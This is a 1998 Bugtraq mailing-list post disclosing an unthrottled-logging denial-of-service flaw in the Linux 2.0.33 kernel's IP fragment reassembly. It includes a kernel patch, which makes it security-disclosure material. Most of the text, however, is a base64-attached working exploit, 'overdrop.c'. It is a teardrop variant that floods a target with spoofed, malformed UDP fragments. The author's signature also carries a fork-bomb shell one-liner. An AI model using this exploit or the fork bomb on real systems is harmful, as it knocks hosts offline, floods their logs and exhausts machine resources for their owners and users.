Bugtraq mailing list archives

Linux 2.0.33 vulnerability: oversized packets

From: lcamtuf () BOSS STASZIC WAW PL (Michal Zalewski)
Date: Fri, 17 Apr 1998 17:21:25 +0200


  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime () docserver cac washington edu for more info.

--8323328-871852648-892826485=:211
Content-Type: TEXT/PLAIN; charset=US-ASCII

I'm not sure if it's known, but I haven't found anything about it.
No matter, there's something strange in net/ipv4/ip_fragment.h (it's
probably Alan's fault):

[ in function ip_glue ]

if(len>65535)
{
        printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr));
        ip_statistics.IpReasmFails++;
        ip_free(qp);
        return NULL;
}

Right, printk with no NETDEBUG nor anything else. So, there's potential
DoS attack - I wrote simple exploit by modyfying teardrop source (mainly,
fragmentation offset of second packet = 0xFFFF), and it's quite nasty (see
attachment).

Fix:

--- ip_fragment.c.orig  Fri Apr 17 16:42:38 1998
+++ ip_fragment.c       Fri Apr 17 17:17:15 1998
@@ -345,7 +345,7 @@

        if(len>65535)
        {
-               printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr));
+               NETDEBUG(printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr)));
                ip_statistics.IpReasmFails++;
                ip_free(qp);
                return NULL;


_______________________________________________________________________
Michal Zalewski [lcamtuf () boss staszic waw pl] <= finger for pub PGP key
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]

--8323328-871852648-892826485=:211
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="overdrop.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.3.96.980417172125.211B@genome>
Content-Description:

Ly8gb3ZlcmRyb3AgYnkgbGNhbXR1ZiBbTGludXggMi4wLjMzIHByaW50ayBh
YnVzZV0NCi8vIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLQ0KLy8gYmFzZWQgb24gKHJlYXBlZCBmcm9tKSB0ZWFy
ZHJvcCBieSByb3V0ZXxkYWVtb245DQoNCiNpbmNsdWRlIDxzdGRpby5oPg0K
I2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2lu
Y2x1ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+DQojaW5jbHVk
ZSA8bmV0aW5ldC9pbi5oPg0KI2luY2x1ZGUgPG5ldGluZXQvdWRwLmg+DQoj
aW5jbHVkZSA8YXJwYS9pbmV0Lmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+
DQojaW5jbHVkZSA8c3lzL3RpbWUuaD4NCiNpbmNsdWRlIDxzeXMvc29ja2V0
Lmg+DQoNCiNkZWZpbmUgSVBfTUYJMHgyMDAwDQojZGVmaW5lIElQSAkweDE0
DQojZGVmaW5lIFVEUEgJMHg4DQojZGVmaW5lIFBBRERJTkcJMHgxYw0KI2Rl
ZmluZSBNQUdJQwkweDMNCiNkZWZpbmUgQ09VTlQJMHhCRUVGDQojZGVmaW5l
IEZSQUcyCTB4RkZGRg0KDQp2b2lkIHVzYWdlKGNoYXIgKm5hbWUpIHsNCiAg
ZnByaW50ZihzdGRlcnIsIiVzIGRzdF9pcCBbIC1uIGhvd19tYW55IF0gWyAt
cyBzcmNfaXAgXVxuIixuYW1lKTsNCiAgZXhpdCgwKTsNCn0NCg0KdV9sb25n
IG5hbWVfcmVzb2x2ZShjaGFyICpob3N0X25hbWUpIHsNCiAgc3RydWN0IGlu
X2FkZHIgYWRkcjsNCiAgc3RydWN0IGhvc3RlbnQgKmhvc3RfZW50Ow0KICBp
ZiAoKGFkZHIuc19hZGRyPWluZXRfYWRkcihob3N0X25hbWUpKT09LTEpIHsN
CiAgICBpZiAoIShob3N0X2VudD1nZXRob3N0YnluYW1lKGhvc3RfbmFtZSkp
KSByZXR1cm4gKDApOw0KICAgIGJjb3B5KGhvc3RfZW50LT5oX2FkZHIsKGNo
YXIgKikmYWRkci5zX2FkZHIsaG9zdF9lbnQtPmhfbGVuZ3RoKTsNCiAgfQ0K
ICByZXR1cm4gKGFkZHIuc19hZGRyKTsNCn0NCg0KDQp2b2lkIHNlbmRfZnJh
Z3MoaW50IHNvY2ssdV9sb25nIHNyY19pcCx1X2xvbmcgZHN0X2lwLHVfc2hv
cnQgc3JjX3BydCx1X3Nob3J0IGRzdF9wcnQpIHsNCiAgdV9jaGFyICpwYWNr
ZXQ9TlVMTCwqcF9wdHI9TlVMTDsNCiAgdV9jaGFyIGJ5dGU7DQogIHN0cnVj
dCBzb2NrYWRkcl9pbiBzaW47DQogIHNpbi5zaW5fZmFtaWx5PUFGX0lORVQ7
DQogIHNpbi5zaW5fcG9ydD1zcmNfcHJ0Ow0KICBzaW4uc2luX2FkZHIuc19h
ZGRyPWRzdF9pcDsNCiAgcGFja2V0PSh1X2NoYXIgKiltYWxsb2MoSVBIK1VE
UEgrUEFERElORyk7DQogIHBfcHRyPXBhY2tldDsNCiAgYnplcm8oKHVfY2hh
ciAqKXBfcHRyLElQSCtVRFBIK1BBRERJTkcpOw0KICBieXRlPTB4NDU7DQog
IG1lbWNweShwX3B0ciwmYnl0ZSxzaXplb2YodV9jaGFyKSk7DQogIHBfcHRy
Kz0yOw0KICAqKCh1X3Nob3J0ICopcF9wdHIpPWh0b25zKElQSCtVRFBIK1BB
RERJTkcpOw0KICBwX3B0cis9MjsNCiAgKigodV9zaG9ydCAqKXBfcHRyKT1o
dG9ucygyNDIpOw0KICBwX3B0cis9MjsNCiAgKigodV9zaG9ydCAqKXBfcHRy
KXw9aHRvbnMoSVBfTUYpOw0KICBwX3B0cis9MjsNCiAgKigodV9zaG9ydCAq
KXBfcHRyKT0weDQwOw0KICBieXRlPUlQUFJPVE9fVURQOw0KICBtZW1jcHko
cF9wdHIrMSwmYnl0ZSxzaXplb2YodV9jaGFyKSk7DQogIHBfcHRyKz00Ow0K
ICAqKCh1X2xvbmcgKilwX3B0cik9c3JjX2lwOw0KICBwX3B0cis9NDsNCiAg
KigodV9sb25nICopcF9wdHIpPWRzdF9pcDsNCiAgcF9wdHIrPTQ7DQogICoo
KHVfc2hvcnQgKilwX3B0cik9aHRvbnMoc3JjX3BydCk7DQogIHBfcHRyKz0y
Ow0KICAqKCh1X3Nob3J0ICopcF9wdHIpPWh0b25zKGRzdF9wcnQpOw0KICBw
X3B0cis9MjsNCiAgKigodV9zaG9ydCAqKXBfcHRyKT1odG9ucyg4K1BBRERJ
TkcpOw0KICBpZiAoc2VuZHRvKHNvY2sscGFja2V0LElQSCtVRFBIK1BBRERJ
TkcsMCwoc3RydWN0IHNvY2thZGRyICopJnNpbiwNCiAgICAgIHNpemVvZihz
dHJ1Y3Qgc29ja2FkZHIpKT09LTEpIHsNCiAgICBwZXJyb3IoIlxuc2VuZHRv
Iik7DQogICAgZnJlZShwYWNrZXQpOw0KICAgIGV4aXQoMSk7DQogIH0NCiAg
cF9wdHI9JnBhY2tldFsyXTsNCiAgKigodV9zaG9ydCAqKXBfcHRyKT1odG9u
cyhJUEgrTUFHSUMrMSk7DQogIHBfcHRyKz00Ow0KICAqKCh1X3Nob3J0ICop
cF9wdHIpPWh0b25zKEZSQUcyKTsNCiAgaWYgKHNlbmR0byhzb2NrLHBhY2tl
dCxJUEgrTUFHSUMrMSwwLChzdHJ1Y3Qgc29ja2FkZHIgKikmc2luLA0KICAg
ICAgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpPT0tMSkgew0KICAgIHBlcnJv
cigiXG5zZW5kdG8iKTsNCiAgICBmcmVlKHBhY2tldCk7DQogICAgZXhpdCgx
KTsNCiAgfQ0KICBmcmVlKHBhY2tldCk7DQp9DQoNCg0KaW50IG1haW4oaW50
IGFyZ2MsIGNoYXIgKiphcmd2KSB7DQogIGludCBvbmU9MSxjb3VudD0wLGks
cmlwX3NvY2s7DQogIHVfbG9uZyAgc3JjX2lwPTAsZHN0X2lwPTA7DQogIHVf
c2hvcnQgc3JjX3BydD0wLGRzdF9wcnQ9MDsNCiAgc3RydWN0IGluX2FkZHIg
YWRkcjsNCiAgZnByaW50ZihzdGRlcnIsIm92ZXJkcm9wIGJ5IGxjYW10dWYg
W2Jhc2VkIG9uIHRlYXJkcm9wIGJ5IHJvdXRlfGRhZW1vbjldXG5cbiIpOw0K
ICBpZigocmlwX3NvY2s9c29ja2V0KEFGX0lORVQsU09DS19SQVcsSVBQUk9U
T19SQVcpKTwwKSB7DQogICAgcGVycm9yKCJyYXcgc29ja2V0Iik7DQogICAg
ZXhpdCgxKTsNCiAgfQ0KICBpZiAoc2V0c29ja29wdChyaXBfc29jayxJUFBS
T1RPX0lQLElQX0hEUklOQ0wsKGNoYXIgKikmb25lLHNpemVvZihvbmUpKTww
KSB7DQogICAgcGVycm9yKCJJUF9IRFJJTkNMIik7DQogICAgZXhpdCgxKTsN
CiAgfQ0KICBpZiAoYXJnYyA8IDIpIHVzYWdlKGFyZ3ZbMF0pOw0KICBpZiAo
IShkc3RfaXA9bmFtZV9yZXNvbHZlKGFyZ3ZbMV0pKSkgew0KICAgIGZwcmlu
dGYoc3RkZXJyLCJDYW4ndCByZXNvbHZlIGRlc3RpbmF0aW9uIGFkZHJlc3Mu
XG4iKTsNCiAgICBleGl0KDEpOw0KICB9DQogIHdoaWxlICgoaT1nZXRvcHQo
YXJnYyxhcmd2LCJzOm46IikpIT1FT0YpIHsNCiAgICBzd2l0Y2ggKGkpIHsN
CiAgICAgIGNhc2UgJ24nOg0KICAgICAgICBjb3VudCAgID0gYXRvaShvcHRh
cmcpOw0KICAgICAgICBicmVhazsNCiAgICAgIGNhc2UgJ3MnOg0KICAgICAg
ICBpZiAoIShzcmNfaXA9bmFtZV9yZXNvbHZlKG9wdGFyZykpKSB7DQogICAg
ICAgICAgZnByaW50ZihzdGRlcnIsIkNhbid0IHJlc29sdmUgc291cmNlIGFk
ZHJlc3MuXG4iKTsNCiAgICAgICAgICBleGl0KDEpOw0KICAgICAgICB9DQoJ
YnJlYWs7DQogICAgICBkZWZhdWx0Og0KICAgICAgICB1c2FnZShhcmd2WzBd
KTsNCiAgICAgICAgYnJlYWs7DQogICAgfQ0KICB9DQogIHNyYW5kb20oKHVu
c2lnbmVkKSh0aW1lKCh0aW1lX3QpMCkpKTsNCiAgaWYgKCFjb3VudCkgY291
bnQ9Q09VTlQ7DQogIGZwcmludGYoc3RkZXJyLCJTZW5kaW5nIG92ZXJzaXpl
ZCBwYWNrZXRzOlxuRnJvbTogIik7DQogIGlmICghc3JjX2lwKSBmcHJpbnRm
KHN0ZGVyciwiICAgICAgIChyYW5kb20pIik7IGVsc2Ugew0KICAgIGFkZHIu
c19hZGRyID0gc3JjX2lwOw0KICAgIGZwcmludGYoc3RkZXJyLCIlMTVzIixp
bmV0X250b2EoYWRkcikpOw0KICB9DQogIGFkZHIuc19hZGRyID0gZHN0X2lw
Ow0KICBmcHJpbnRmKHN0ZGVyciwiXG4gIFRvOiAlMTVzXG4iLGluZXRfbnRv
YShhZGRyKSk7DQogIGZwcmludGYoc3RkZXJyLCIgQW10OiAlNWRcbiIsY291
bnQpOw0KICBmcHJpbnRmKHN0ZGVyciwiWyAiKTsNCiAgZm9yIChpPTA7aTxj
b3VudDtpKyspIHsNCiAgICBpZiAoIXNyY19pcCkgc2VuZF9mcmFncyhyaXBf
c29jayxyYW5kKCksZHN0X2lwLHJhbmQoKSxyYW5kKCkpOyBlbHNlDQogICAg
ICBzZW5kX2ZyYWdzKHJpcF9zb2NrLHNyY19pcCxkc3RfaXAscmFuZCgpLHJh
bmQoKSk7DQogICAgZnByaW50ZihzdGRlcnIsICJiMDB6ICIpOw0KICAgIHVz
bGVlcCg1MDApOw0KICB9DQogIGZwcmludGYoc3RkZXJyLCAiXVxuIik7DQog
IHJldHVybiAoMCk7DQp9DQo=
--8323328-871852648-892826485=:211--

Current thread:

(follow-up) Wietse's RPCBIND, (continued)
- (follow-up) Wietse's RPCBIND Chiaki Ishikawa (Apr 13)
- Re: APC UPS PowerChute PLUS exploit... Chris Liljenstolpe - Network Engineer (Apr 12)
  - Re: APC UPS PowerChute PLUS exploit... Iain P.C. Moffat (Apr 13)
  - IRIX LicenseManager(1M) Vulnerabilities SGI Security Coordinator (Apr 13)
- Re: APC UPS PowerChute PLUS exploit... Rick Perry (Apr 13)
- Re: APC UPS PowerChute PLUS exploit... Pascal Gienger (Apr 14)
  - Re: APC UPS PowerChute PLUS exploit... Scott Stone (Apr 14)
  - New possible exploit for 2.0.33 (kfree_skb error) Paul (Apr 15)
    - Re: New possible exploit for 2.0.33 (kfree_skb error) Alan Cox (Apr 15)
    - Linux 2.0.33 vulnerability: fragment patterns Alan Cox (Apr 16)
    - Linux 2.0.33 vulnerability: oversized packets Michal Zalewski (Apr 17)
    - Linux 2.0.34pre10: Summary of fixed vulnerabilities Alan Cox (Apr 20)
    - Re: Linux 2.0.33 vulnerability: oversized packets Jon Lewis (Apr 20)
    - Re: Linux 2.0.33 vulnerability: oversized packets Krzysztof G. Baranowski (Apr 21)
    - code to crash cistron's radius Hamdi Tounsi (Apr 21)
    - nestea v2. The program that DoS's 2.0.33s The Tree of Life (Apr 18)
    - xdm problems Thomas Roessler (Apr 16)
    - Re: xdm problems Matthieu Herrb (Apr 20)
    - SECURITY: procps 1.2.7 fixes security hole Aleph One (Apr 20)
  - syndrop / modified version Ted Hickman [Network Admin] (Apr 15)
- Re: APC UPS PowerChute PLUS exploit... Carl Dunham (Apr 21)